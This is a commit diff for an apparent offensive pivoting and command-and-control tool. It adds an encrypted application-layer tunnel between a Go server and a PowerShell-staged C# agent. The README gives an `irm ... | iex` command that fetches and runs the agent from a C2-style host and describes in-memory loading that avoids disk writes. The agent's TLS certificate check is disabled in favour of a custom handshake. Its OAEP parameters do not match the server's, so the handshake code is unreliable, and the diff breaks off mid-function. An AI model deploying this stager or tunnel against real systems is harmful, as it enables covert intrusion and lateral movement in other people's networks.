Add application-layer tunnel encryption

This commit is contained in:
Harrison-Wells-Cyber
2026-07-22 16:33:01 -07:00
parent 5fd2589a10
commit d6de63e017
9 changed files with 591 additions and 126 deletions
+39 -25
View File
@@ -23,9 +23,9 @@ administrator privileges on the Windows agent host.
- **Enrollment:** the server creates a short-lived one-time staging URL. The - **Enrollment:** the server creates a short-lived one-time staging URL. The
generated agent script contains an enrollment token rather than a long-term generated agent script contains an enrollment token rather than a long-term
PSK. PSK.
- **TLS:** server certificate pinning is mandatory for the agent. The C# core - **Trust anchor:** TLS is transport and staging only. The agent pins the stable
refuses to continue unless the presented server certificate matches the pinned PS-Proxy application identity public key and establishes an authenticated
SHA-256 DER hash. encrypted tunnel inside TLS before enrollment tokens or tunnel frames are sent.
- **Disk behavior:** release agents do not use `Add-Type`, do not invoke - **Disk behavior:** release agents do not use `Add-Type`, do not invoke
`csc.exe` on the target, and do not intentionally write the managed agent DLL `csc.exe` on the target, and do not intentionally write the managed agent DLL
to disk. The embedded DLL is loaded with to disk. The embedded DLL is loaded with
@@ -87,8 +87,11 @@ explicitly with `--agent-assembly-b64-file`.
## Start the server with transparent TCP routing ## Start the server with transparent TCP routing
Use a real certificate whose leaf DER hash will be pinned by the agent. On the Use a real certificate for HTTPS transport/staging. PS-Proxy will create or reuse
Linux server, run as root so PS-Proxy can install and remove iptables NAT rules: `psproxy_identity.pem` as the application-layer trust anchor; keep this file
stable across server restarts and redeployments so existing staged agents trust
the same server identity. On the Linux server, run as root so PS-Proxy can
install and remove iptables NAT rules:
```bash ```bash
sudo ./psproxy-server \ sudo ./psproxy-server \
@@ -114,9 +117,10 @@ The server prints a one-time command:
irm https://c2.example.com/a/<one-time-id> | iex irm https://c2.example.com/a/<one-time-id> | iex
``` ```
The generated script auto-starts, loads the embedded C# core in memory, validates The generated script auto-starts, loads the embedded C# core in memory, verifies
the pinned server certificate, enrolls with the one-time token, and switches to the staged PS-Proxy identity public key with an application-layer handshake,
the framed tunnel protocol. sends enrollment inside the encrypted/authenticated tunnel, and then uses that
protected tunnel for all framed TCP and DNS relay traffic.
## Optional fixed-target developer TCP relay ## Optional fixed-target developer TCP relay
@@ -151,8 +155,15 @@ connections during high-concurrency tools such as NetExec; the default is 256. W
- Use HTTPS staging. Plain HTTP `irm | iex` is mechanically possible, but it is - Use HTTPS staging. Plain HTTP `irm | iex` is mechanically possible, but it is
not acceptable for sensitive environments because staging tampering means code not acceptable for sensitive environments because staging tampering means code
execution on the Windows host. execution on the Windows host.
- The agent pins the server certificate before enrollment or tunnel traffic. - TLS is transport only; do not use the HTTPS certificate as the PS-Proxy root of trust.
Certificate pin mismatch is fatal. - The server has a stable RSA identity key (`--identity-key`, default
`psproxy_identity.pem`). If the file is missing, the server generates a
3072-bit RSA key and logs the SHA-256 pin of the public key DER.
- Keep `psproxy_identity.pem` stable and private. Rotating it intentionally
changes the PS-Proxy trust anchor and requires staging new agents.
- The staged agent embeds the server identity public key, performs an
application-layer PSP1 handshake, verifies a server HMAC proof, and only then
sends enrollment/reconnect tokens inside encrypted authenticated frames.
- Enrollment URLs are short-lived and one-time use. - Enrollment URLs are short-lived and one-time use.
- The enrollment token is placed in the HTTPS response body, not in the URL. - The enrollment token is placed in the HTTPS response body, not in the URL.
- Do not log generated agent bodies or enrollment tokens. - Do not log generated agent bodies or enrollment tokens.
@@ -163,30 +174,33 @@ connections during high-concurrency tools such as NetExec; the default is 256. W
### TLS inspection / enterprise decryption ### TLS inspection / enterprise decryption
If an authorized enterprise TLS inspection device presents a different leaf PS-Proxy now treats HTTPS/TLS as transport and staging rather than as the tunnel
certificate to the Windows agent than the certificate loaded by the VPS server, root of trust. Enterprise TLS inspection products such as Palo Alto, Zscaler, or
agent certificate pinning will fail. The safest fix is to exempt the PS-Proxy other decrypting proxies may present an enterprise-issued leaf certificate to the
server domain from TLS decryption so the agent sees the VPS certificate directly. agent; this should no longer break agent/server trust because the agent verifies
the staged PS-Proxy identity public key inside the TLS connection.
For controlled labs where decryption cannot be bypassed, pass the inspected leaf Operational guidance:
certificate SHA-256 DER hash explicitly:
```bash - Keep using HTTPS for staging so the one-time loader is not exposed to trivial
--agent-cert-pin-override <64-char-sha256-hex-pin> network tampering.
``` - Keep `psproxy_identity.pem` private and stable. It is the PS-Proxy identity,
and its public key pin is what identifies the legitimate server to agents.
Only use this when you control and trust the inspection device. This pins the - Back up `psproxy_identity.pem` with the same care as other server secrets. If
agent to the certificate it actually sees, not the certificate file loaded by the it is lost and regenerated, previously staged agents will not trust the new
VPS server. identity unless they are restaged with the new public key.
- TLS inspection can still observe the outer HTTPS transport metadata, but it
cannot read or tamper with protected PSP1 tunnel frames after the
application-layer handshake without detection.
## Current implementation status ## Current implementation status
Implemented now: Implemented now:
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling. - Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
- Leaf certificate pin calculation for generated agent configuration. - Stable PS-Proxy RSA identity key generation/reuse with a logged public key pin staged into generated agents.
- Short-lived one-time staging URLs. - Short-lived one-time staging URLs.
- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment. - Application-layer PSP1 secure handshake before enrollment, followed by encrypted/authenticated frame transport and reconnect-token authentication after first enrollment.
- Agent auto-reconnect with exponential backoff for transient tunnel failures. - Agent auto-reconnect with exponential backoff for transient tunnel failures.
- Framed multiplexed stream protocol. - Framed multiplexed stream protocol.
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs. - Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
+140 -26
View File
@@ -18,7 +18,11 @@ namespace PSProxy.Agent
private const int MaxPayload = 1 << 20; private const int MaxPayload = 1 << 20;
private readonly string server; private readonly string server;
private readonly int port; private readonly int port;
private readonly string certPin; private readonly string serverKey;
private ulong sendSeq;
private ulong recvSeq;
private byte[] encKey;
private byte[] macKey;
private readonly string enrollToken; private readonly string enrollToken;
private readonly string reconnectToken; private readonly string reconnectToken;
private readonly string dnsTarget; private readonly string dnsTarget;
@@ -27,15 +31,15 @@ namespace PSProxy.Agent
private SslStream tls; private SslStream tls;
private volatile bool stopping; private volatile bool stopping;
public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget) public Tunnel(string server, int port, string serverKey, string enrollToken, string reconnectToken, string dnsTarget)
{ {
this.server = server; this.server = server;
this.port = port; this.port = port;
this.certPin = NormalizeHex(certPin); this.serverKey = serverKey;
this.enrollToken = enrollToken; this.enrollToken = enrollToken;
this.reconnectToken = reconnectToken ?? ""; this.reconnectToken = reconnectToken ?? "";
this.dnsTarget = dnsTarget ?? ""; this.dnsTarget = dnsTarget ?? "";
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string"); if (String.IsNullOrWhiteSpace(serverKey)) throw new ArgumentException("ServerKey is required");
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required"); if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
} }
@@ -70,7 +74,9 @@ namespace PSProxy.Agent
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate)) using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
{ {
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false); tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n"); WriteAscii("PSP1\n");
SecureHandshake();
SendFrame(new Frame(0, FramePing, Encoding.ASCII.GetBytes("ENROLL " + enrollToken + " " + reconnectToken)));
Frame hello = ReadFrame(); Frame hello = ReadFrame();
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment"); if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
Console.Error.WriteLine("[ps-proxy] enrolled and ready"); Console.Error.WriteLine("[ps-proxy] enrolled and ready");
@@ -79,6 +85,52 @@ namespace PSProxy.Agent
} }
} }
private void SecureHandshake()
{
byte[] secret = RandomBytes(32);
byte[] nonce = RandomBytes(32);
byte[] pubDer = Convert.FromBase64String(serverKey.Trim());
byte[] encSecret;
using (var rsa = new RSACryptoServiceProvider())
{
rsa.ImportParameters(ParseRsaPublicKey(pubDer));
encSecret = rsa.Encrypt(secret, true);
}
string hello = "HELLO " + B64Url(encSecret) + " " + B64Url(nonce) + "\n";
WriteAscii(hello);
string proofLine = ReadLineAscii();
string[] parts = proofLine.Trim().Split(new char[] { ' ' }, StringSplitOptions.RemoveEmptyEntries);
if (parts.Length != 3 || parts[0] != "PROOF") throw new Exception("invalid secure handshake proof");
byte[] serverNonce = B64UrlDecode(parts[1]);
byte[] proof = B64UrlDecode(parts[2]);
byte[] expected;
using (var h = new HMACSHA256(secret))
{
expected = h.ComputeHash(Concat(Concat(Concat(Concat(Encoding.ASCII.GetBytes("PSP1\n"), Encoding.ASCII.GetBytes(hello)), serverNonce), nonce), pubDer));
}
if (!ConstantTimeEquals(proof, expected)) throw new Exception("secure handshake proof mismatch");
using (var sha = SHA256.Create())
{
encKey = sha.ComputeHash(Concat(secret, Encoding.ASCII.GetBytes("psproxy aes-cbc")));
macKey = sha.ComputeHash(Concat(secret, Encoding.ASCII.GetBytes("psproxy hmac")));
}
sendSeq = 0; recvSeq = 0;
}
private string ReadLineAscii()
{
var ms = new MemoryStream();
while (true)
{
int b = tls.ReadByte();
if (b < 0) throw new EndOfStreamException();
ms.WriteByte((byte)b);
if (b == '\n') return Encoding.ASCII.GetString(ms.ToArray());
if (ms.Length > 8192) throw new IOException("line too long");
}
}
private void ReadLoop() private void ReadLoop()
{ {
while (!stopping) while (!stopping)
@@ -191,26 +243,65 @@ namespace PSProxy.Agent
{ {
if (f.Payload == null) f.Payload = new byte[0]; if (f.Payload == null) f.Payload = new byte[0];
if (f.Payload.Length > MaxPayload) throw new InvalidOperationException("frame payload too large"); if (f.Payload.Length > MaxPayload) throw new InvalidOperationException("frame payload too large");
byte[] hdr = new byte[13]; byte[] plainFrame = EncodePlainFrame(f);
WriteU64BE(hdr, 0, f.StreamID); byte[] seq = U64BE(sendSeq);
hdr[8] = f.Type; byte[] plain = Concat(seq, plainFrame);
WriteI32BE(hdr, 9, f.Payload.Length); byte[] padded = Pkcs7Pad(plain, 16);
byte[] iv = RandomBytes(16);
byte[] ct;
using (var aes = Aes.Create())
{
aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.None; aes.Key = encKey; aes.IV = iv;
using (var enc = aes.CreateEncryptor()) { ct = enc.TransformFinalBlock(padded, 0, padded.Length); }
}
byte[] body = Concat(iv, ct);
byte[] tag;
using (var h = new HMACSHA256(macKey)) { tag = h.ComputeHash(Concat(seq, body)); }
byte[] rec = Concat(body, tag);
byte[] len = new byte[4]; WriteI32BE(len, 0, rec.Length);
lock (sendLock) lock (sendLock)
{ {
tls.Write(hdr, 0, hdr.Length); tls.Write(len, 0, len.Length); tls.Write(rec, 0, rec.Length); tls.Flush();
if (f.Payload.Length > 0) tls.Write(f.Payload, 0, f.Payload.Length); sendSeq++;
tls.Flush();
} }
} }
private Frame ReadFrame() private Frame ReadFrame()
{ {
byte[] hdr = ReadExact(13); int len = ReadI32BE(ReadExact(4), 0);
ulong sid = ReadU64BE(hdr, 0); if (len < 48 || len > MaxPayload + 1024) throw new IOException("invalid secure record length: " + len);
byte typ = hdr[8]; byte[] rec = ReadExact(len);
int len = ReadI32BE(hdr, 9); byte[] body = Slice(rec, 0, len - 32);
if (len < 0 || len > MaxPayload) throw new IOException("frame payload too large: " + len); byte[] tag = Slice(rec, len - 32, 32);
return new Frame(sid, typ, len == 0 ? new byte[0] : ReadExact(len)); byte[] seq = U64BE(recvSeq);
byte[] expected;
using (var h = new HMACSHA256(macKey)) { expected = h.ComputeHash(Concat(seq, body)); }
if (!ConstantTimeEquals(tag, expected)) throw new IOException("secure frame authentication failed");
byte[] iv = Slice(body, 0, 16); byte[] ct = Slice(body, 16, body.Length - 16); byte[] pt;
using (var aes = Aes.Create())
{
aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.None; aes.Key = encKey; aes.IV = iv;
using (var dec = aes.CreateDecryptor()) { pt = dec.TransformFinalBlock(ct, 0, ct.Length); }
}
pt = Pkcs7Unpad(pt, 16);
ulong gotSeq = ReadU64BE(pt, 0);
if (gotSeq != recvSeq) throw new IOException("secure frame sequence mismatch");
recvSeq++;
return DecodePlainFrame(Slice(pt, 8, pt.Length - 8));
}
private byte[] EncodePlainFrame(Frame f)
{
byte[] b = new byte[13 + f.Payload.Length];
WriteU64BE(b, 0, f.StreamID); b[8] = f.Type; WriteI32BE(b, 9, f.Payload.Length);
Buffer.BlockCopy(f.Payload, 0, b, 13, f.Payload.Length); return b;
}
private Frame DecodePlainFrame(byte[] b)
{
if (b.Length < 13) throw new IOException("frame too short");
int len = ReadI32BE(b, 9); if (len < 0 || len > MaxPayload || b.Length != 13 + len) throw new IOException("invalid frame length");
return new Frame(ReadU64BE(b, 0), b[8], Slice(b, 13, len));
} }
private byte[] ReadExact(int n) private byte[] ReadExact(int n)
@@ -235,13 +326,8 @@ namespace PSProxy.Agent
private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{ {
var cert2 = new X509Certificate2(certificate); // TLS is transport/staging only. PS-Proxy server identity is verified by SecureHandshake.
using (var sha = SHA256.Create()) return true;
{
string got = BitConverter.ToString(sha.ComputeHash(cert2.RawData)).Replace("-", "").ToLowerInvariant();
if (got != certPin) { Console.Error.WriteLine("[ps-proxy] cert pin mismatch: " + got); return false; }
}
return sslPolicyErrors == SslPolicyErrors.None;
} }
private static void SplitTarget(string target, out string host, out int dstPort) private static void SplitTarget(string target, out string host, out int dstPort)
@@ -264,7 +350,35 @@ namespace PSProxy.Agent
client.EndConnect(ar); client.EndConnect(ar);
} }
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
private static byte[] RandomBytes(int n) { byte[] b = new byte[n]; using (var rng = RandomNumberGenerator.Create()) { rng.GetBytes(b); } return b; }
private static byte[] Concat(byte[] a, byte[] b) { byte[] o = new byte[a.Length + b.Length]; Buffer.BlockCopy(a,0,o,0,a.Length); Buffer.BlockCopy(b,0,o,a.Length,b.Length); return o; }
private static byte[] Slice(byte[] b, int o, int n) { byte[] r = new byte[n]; Buffer.BlockCopy(b,o,r,0,n); return r; }
private static byte[] U64BE(ulong v) { byte[] b = new byte[8]; WriteU64BE(b,0,v); return b; }
private static string B64Url(byte[] b) { return Convert.ToBase64String(b).TrimEnd('=').Replace('+','-').Replace('/','_'); }
private static byte[] B64UrlDecode(string s) { string t = s.Replace('-','+').Replace('_','/'); while (t.Length % 4 != 0) t += "="; return Convert.FromBase64String(t); }
private static bool ConstantTimeEquals(byte[] a, byte[] b) { if (a == null || b == null || a.Length != b.Length) return false; int d = 0; for (int i=0;i<a.Length;i++) d |= a[i]^b[i]; return d == 0; }
private static byte[] Pkcs7Pad(byte[] b, int block) { int pad = block - (b.Length % block); byte[] o = new byte[b.Length + pad]; Buffer.BlockCopy(b,0,o,0,b.Length); for (int i=b.Length;i<o.Length;i++) o[i]=(byte)pad; return o; }
private static byte[] Pkcs7Unpad(byte[] b, int block) { if (b.Length == 0 || b.Length % block != 0) throw new IOException("invalid padding"); int p = b[b.Length-1]; if (p < 1 || p > block || p > b.Length) throw new IOException("invalid padding"); for (int i=b.Length-p;i<b.Length;i++) if (b[i] != p) throw new IOException("invalid padding"); return Slice(b,0,b.Length-p); }
private static RSAParameters ParseRsaPublicKey(byte[] spki)
{
int o = 0;
int spkiEnd = BeginTLV(spki, ref o, 0x30);
int algEnd = BeginTLV(spki, ref o, 0x30);
o = algEnd;
byte[] bit = ReadTLV(spki, ref o, 0x03);
if (o != spkiEnd || bit.Length < 1 || bit[0] != 0) throw new CryptographicException("invalid public key");
o = 1;
int rsaEnd = BeginTLV(bit, ref o, 0x30);
byte[] mod = ReadTLV(bit, ref o, 0x02);
byte[] exp = ReadTLV(bit, ref o, 0x02);
if (o != rsaEnd) throw new CryptographicException("invalid public key");
if (mod.Length > 1 && mod[0] == 0) mod = Slice(mod, 1, mod.Length - 1);
return new RSAParameters { Modulus = mod, Exponent = exp };
}
private static int BeginTLV(byte[] b, ref int o, int tag) { if (o >= b.Length || b[o++] != tag) throw new CryptographicException("asn1 tag"); int len = ReadLen(b, ref o); if (len < 0 || o + len > b.Length) throw new CryptographicException("asn1 len"); int end = o + len; return end; }
private static byte[] ReadTLV(byte[] b, ref int o, int tag) { int end = BeginTLV(b, ref o, tag); byte[] v = Slice(b, o, end - o); o = end; return v; }
private static int ReadLen(byte[] b, ref int o) { if (o >= b.Length) throw new CryptographicException("asn1 len"); int v = b[o++]; if ((v & 0x80) == 0) return v; int n = v & 0x7f; if (n < 1 || n > 4 || o + n > b.Length) throw new CryptographicException("asn1 len"); int len = 0; for (int i = 0; i < n; i++) len = (len << 8) | b[o++]; return len; }
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; } private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; } private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
private static void WriteU64BE(byte[] b, int o, ulong v) { for (int i = 7; i >= 0; i--) { b[o + i] = (byte)v; v >>= 8; } } private static void WriteU64BE(byte[] b, int o, ulong v) { for (int i = 7; i >= 0; i--) { b[o + i] = (byte)v; v >>= 8; } }
+4 -4
View File
@@ -2,7 +2,7 @@
param( param(
[string]$Server = "{{.Server}}", [string]$Server = "{{.Server}}",
[int]$Port = {{.Port}}, [int]$Port = {{.Port}},
[string]$CertPin = "{{.CertPin}}", [string]$ServerKey = "{{.ServerKey}}",
[string]$EnrollToken = "{{.EnrollToken}}", [string]$EnrollToken = "{{.EnrollToken}}",
[string]$ReconnectToken = "{{.ReconnectToken}}", [string]$ReconnectToken = "{{.ReconnectToken}}",
[string]$DNSTarget = "{{.DNSTarget}}", [string]$DNSTarget = "{{.DNSTarget}}",
@@ -30,13 +30,13 @@ function Start-PSTunnel {
param( param(
[Parameter(Mandatory=$true)][string]$Server, [Parameter(Mandatory=$true)][string]$Server,
[int]$Port = 443, [int]$Port = 443,
[Parameter(Mandatory=$true)][string]$CertPin, [Parameter(Mandatory=$true)][string]$ServerKey,
[Parameter(Mandatory=$true)][string]$EnrollToken, [Parameter(Mandatory=$true)][string]$EnrollToken,
[string]$ReconnectToken = "", [string]$ReconnectToken = "",
[string]$DNSTarget = "" [string]$DNSTarget = ""
) )
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly } if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget) $t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $ServerKey, $EnrollToken, $ReconnectToken, $DNSTarget)
$t.Run() $t.Run()
} }
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget } if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -ServerKey $ServerKey -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
+126 -49
View File
@@ -2,8 +2,13 @@ package main
import ( import (
"bufio" "bufio"
"crypto/hmac"
"crypto/rand"
"crypto/rsa"
"crypto/sha256" "crypto/sha256"
"crypto/tls" "crypto/tls"
"crypto/x509"
"encoding/base64"
"encoding/hex" "encoding/hex"
"encoding/json" "encoding/json"
"encoding/pem" "encoding/pem"
@@ -34,7 +39,7 @@ func main() {
port := flag.Int("port", 443, "TLS listener port") port := flag.Int("port", 443, "TLS listener port")
cert := flag.String("cert", "", "TLS fullchain PEM; defaults to /etc/letsencrypt/live/<domain>/fullchain.pem") cert := flag.String("cert", "", "TLS fullchain PEM; defaults to /etc/letsencrypt/live/<domain>/fullchain.pem")
key := flag.String("key", "", "TLS private key PEM; defaults to /etc/letsencrypt/live/<domain>/privkey.pem") key := flag.String("key", "", "TLS private key PEM; defaults to /etc/letsencrypt/live/<domain>/privkey.pem")
agentCertPinOverride := flag.String("agent-cert-pin-override", "", "override SHA-256 DER certificate pin embedded in staged agents; use only when an authorized TLS inspection device presents a different leaf cert") identityKeyPath := flag.String("identity-key", "psproxy_identity.pem", "stable RSA identity private key PEM for PS-Proxy application-layer tunnel trust")
tun := flag.String("tun", "psproxy0", "TUN interface name for the planned netstack data plane") tun := flag.String("tun", "psproxy0", "TUN interface name for the planned netstack data plane")
agentTemplate := flag.String("agent-template", "agent/loader/agent.ps1.tmpl", "PowerShell agent loader template") agentTemplate := flag.String("agent-template", "agent/loader/agent.ps1.tmpl", "PowerShell agent loader template")
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present") agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
@@ -71,16 +76,13 @@ func main() {
if err := validateRoutes(routes); err != nil { if err := validateRoutes(routes); err != nil {
log.Fatal(err) log.Fatal(err)
} }
pin, err := certPin(*cert) identityKey, err := loadOrCreateIdentityKey(*identityKeyPath)
if err != nil { if err != nil {
log.Fatalf("certificate pin failed: %v", err) log.Fatalf("identity key load failed: %v", err)
} }
if *agentCertPinOverride != "" { serverKey, identityPin, err := publicKeyStaging(identityKey)
pin, err = normalizeCertPin(*agentCertPinOverride) if err != nil {
if err != nil { log.Fatalf("identity public key encode failed: %v", err)
log.Fatalf("invalid --agent-cert-pin-override: %v", err)
}
log.Printf("WARNING: using operator-supplied agent certificate pin override")
} }
assembly, err := loadAssemblyB64(*agentAssemblyFile) assembly, err := loadAssemblyB64(*agentAssemblyFile)
if err != nil { if err != nil {
@@ -91,11 +93,12 @@ func main() {
} }
tmpl := template.Must(template.ParseFiles(*agentTemplate)) tmpl := template.Must(template.ParseFiles(*agentTemplate))
store := staging.NewStore(*ttl) store := staging.NewStore(*ttl)
sess, err := store.Create(*domain, *port, pin, *dnsTarget) sess, err := store.Create(*domain, *port, serverKey, *dnsTarget)
if err != nil { if err != nil {
log.Fatal(err) log.Fatal(err)
} }
server := NewTunnelServer(store, *maxStreams) server := NewTunnelServer(store, *maxStreams)
server.identityKey = identityKey
mux := http.NewServeMux() mux := http.NewServeMux()
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly)) mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) }) mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
@@ -116,7 +119,8 @@ func main() {
addr := fmt.Sprintf("%s:%d", *listen, *port) addr := fmt.Sprintf("%s:%d", *listen, *port)
log.Printf("PS-Proxy Go server starting on https://%s", addr) log.Printf("PS-Proxy Go server starting on https://%s", addr)
log.Printf("TLS certificate: %s", *cert) log.Printf("TLS certificate: %s", *cert)
log.Printf("Agent cert pin: %s", pin) log.Printf("PS-Proxy identity key: %s", *identityKeyPath)
log.Printf("PS-Proxy identity public key pin: %s", identityPin)
log.Printf("Planned TUN target: %s routes=%s", *tun, strings.Join(routes, ",")) log.Printf("Planned TUN target: %s routes=%s", *tun, strings.Join(routes, ","))
if *redirect { if *redirect {
log.Printf("Transparent redirect mode enabled on 127.0.0.1:%d", *redirectPort) log.Printf("Transparent redirect mode enabled on 127.0.0.1:%d", *redirectPort)
@@ -132,12 +136,13 @@ func main() {
} }
type TunnelServer struct { type TunnelServer struct {
store *staging.Store store *staging.Store
mu sync.Mutex identityKey *rsa.PrivateKey
session *AgentSession mu sync.Mutex
nextID atomic.Uint64 session *AgentSession
dnsID atomic.Uint64 nextID atomic.Uint64
maxStreams int dnsID atomic.Uint64
maxStreams int
} }
func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer { func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
@@ -194,13 +199,14 @@ type AgentSession struct {
dnsPending map[uint64]chan []byte dnsPending map[uint64]chan []byte
locals map[uint64]*localStream locals map[uint64]*localStream
maxStreams int maxStreams int
codec protocol.Codec
} }
func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession { func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
if maxStreams < 1 { if maxStreams < 1 {
maxStreams = 1 maxStreams = 1
} }
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams} return &AgentSession{conn: c, br: br, codec: protocol.NewPlainCodec(br, c), closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
} }
func (a *AgentSession) Close() { func (a *AgentSession) Close() {
@@ -227,7 +233,7 @@ func (a *AgentSession) Close() {
func (a *AgentSession) send(f protocol.Frame) error { func (a *AgentSession) send(f protocol.Frame) error {
a.sendMu.Lock() a.sendMu.Lock()
defer a.sendMu.Unlock() defer a.sendMu.Unlock()
return protocol.WriteFrame(a.conn, f) return a.codec.WriteFrame(f)
} }
func (a *AgentSession) Open(id uint64, target string) error { func (a *AgentSession) Open(id uint64, target string) error {
@@ -280,7 +286,7 @@ func (a *AgentSession) RemoveLocal(id uint64) {
func (a *AgentSession) Run() { func (a *AgentSession) Run() {
defer a.Close() defer a.Close()
for { for {
f, err := protocol.ReadFrame(a.br) f, err := a.codec.ReadFrame()
if err != nil { if err != nil {
log.Printf("agent disconnected: %v", err) log.Printf("agent disconnected: %v", err)
return return
@@ -648,26 +654,30 @@ func handleTLSConn(raw net.Conn, cfg *tls.Config, mux *http.ServeMux, server *Tu
} }
func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) { func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
line, err := br.ReadString('\n') codec := protocol.Codec(protocol.NewPlainCodec(br, conn))
if err != nil { if server.identityKey != nil {
secure, err := serverHandshake(conn, br, server.identityKey)
if err != nil {
log.Printf("agent secure handshake failed: %v", err)
_ = conn.Close()
return
}
codec = secure
}
f, err := codec.ReadFrame()
if err != nil || f.Type != protocol.FramePing {
_ = conn.Close() _ = conn.Close()
return return
} }
line = strings.TrimSpace(line) fields := strings.Fields(string(f.Payload))
const prefix = "ENROLL " if len(fields) == 0 || fields[0] != "ENROLL" || len(fields) < 2 {
if !strings.HasPrefix(line, prefix) {
_ = conn.Close() _ = conn.Close()
return return
} }
fields := strings.Fields(strings.TrimPrefix(line, prefix)) enrollToken := fields[1]
if len(fields) == 0 {
_ = conn.Close()
return
}
enrollToken := fields[0]
reconnectToken := "" reconnectToken := ""
if len(fields) > 1 { if len(fields) > 2 {
reconnectToken = fields[1] reconnectToken = fields[2]
} }
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil { if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
log.Printf("agent enrollment failed: %v", err) log.Printf("agent enrollment failed: %v", err)
@@ -675,6 +685,7 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
return return
} }
a := NewAgentSession(conn, br, server.maxStreams) a := NewAgentSession(conn, br, server.maxStreams)
a.codec = codec
server.SetSession(a) server.SetSession(a)
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr()) log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")}) _ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
@@ -682,6 +693,55 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
server.ClearSession(a) server.ClearSession(a)
} }
func serverHandshake(conn net.Conn, br *bufio.Reader, key *rsa.PrivateKey) (*protocol.SecureCodec, error) {
line, err := br.ReadString('\n')
if err != nil {
return nil, err
}
parts := strings.Fields(strings.TrimSpace(line))
if len(parts) != 3 || parts[0] != "HELLO" {
return nil, errors.New("expected HELLO")
}
encSecret, err := base64.RawURLEncoding.DecodeString(parts[1])
if err != nil {
return nil, err
}
clientNonce, err := base64.RawURLEncoding.DecodeString(parts[2])
if err != nil {
return nil, err
}
if len(clientNonce) != 32 {
return nil, errors.New("invalid client nonce")
}
secret, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, key, encSecret, []byte("PS-Proxy PSP1 session"))
if err != nil {
return nil, err
}
if len(secret) != 32 {
return nil, errors.New("invalid session secret")
}
serverNonce := make([]byte, 32)
if _, err := rand.Read(serverNonce); err != nil {
return nil, err
}
